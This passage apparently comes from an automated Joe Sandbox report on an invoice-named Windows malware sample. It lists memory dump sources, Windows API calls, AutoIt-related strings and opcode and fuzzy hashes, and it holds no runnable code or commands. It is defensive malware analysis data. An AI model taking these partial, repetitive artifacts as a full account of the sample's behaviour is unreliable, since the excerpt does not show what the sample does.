                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                          • String ID:
                                                          • API String ID: 1187119602-0
                                                          • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                          • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                          • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                          • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                          • String ID:
                                                          • API String ID: 1597257046-0
                                                          • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                          • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                          • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                          • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                          • __malloc_crt.LIBCMT ref: 0041F5B6
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: EnvironmentStrings$Free__malloc_crt
                                                          • String ID:
                                                          • API String ID: 237123855-0
                                                          • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                          • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                          • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                          • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: DeleteDestroyObject$IconWindow
                                                          • String ID:
                                                          • API String ID: 3349847261-0
                                                          • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                          • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                          • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                          • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                          • String ID:
                                                          • API String ID: 2223660684-0
                                                          • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                          • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                          • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                          • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                          APIs
                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                          • LineTo.GDI32(?,?,?), ref: 00447326
                                                          • EndPath.GDI32(?), ref: 00447336
                                                          • StrokePath.GDI32(?), ref: 00447344
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                          • String ID:
                                                          • API String ID: 2783949968-0
                                                          • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                          • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                          • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                          • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                          • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                          • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 2710830443-0
                                                          • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                          • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                          • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                          • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                          • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                            • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                            • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                          • String ID:
                                                          • API String ID: 146765662-0
                                                          • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                          • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                          • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                          • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 00472B63
                                                          • GetDC.USER32(00000000), ref: 00472B6C
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                          • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                          • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                          • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                          • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 00472BB2
                                                          • GetDC.USER32(00000000), ref: 00472BBB
                                                          • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                          • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                          • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                          • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                          • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                          APIs
                                                          • __getptd_noexit.LIBCMT ref: 00415150
                                                            • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                            • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                            • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                            • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                            • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                          • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                          • __freeptd.LIBCMT ref: 0041516B
                                                          • ExitThread.KERNEL32 ref: 00415173
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                          • String ID:
                                                          • API String ID: 1454798553-0
                                                          • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                          • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                          • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                          • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _strncmp
                                                          • String ID: Q\E
                                                          • API String ID: 909875538-2189900498
                                                          • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                          • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                          • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                          • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                          APIs
                                                          • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                          • String ID: AutoIt3GUI$Container
                                                          • API String ID: 2652923123-3941886329
                                                          • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                          • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                          • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                          • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memmove_strncmp
                                                          • String ID: U$\
                                                          • API String ID: 2666721431-100911408
                                                          • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                          • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                          • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                          • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                          APIs
                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                          • __wcsnicmp.LIBCMT ref: 00467288
                                                          • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                          • String ID: LPT
                                                          • API String ID: 3035604524-1350329615
                                                          • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                          • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                          • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                          • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
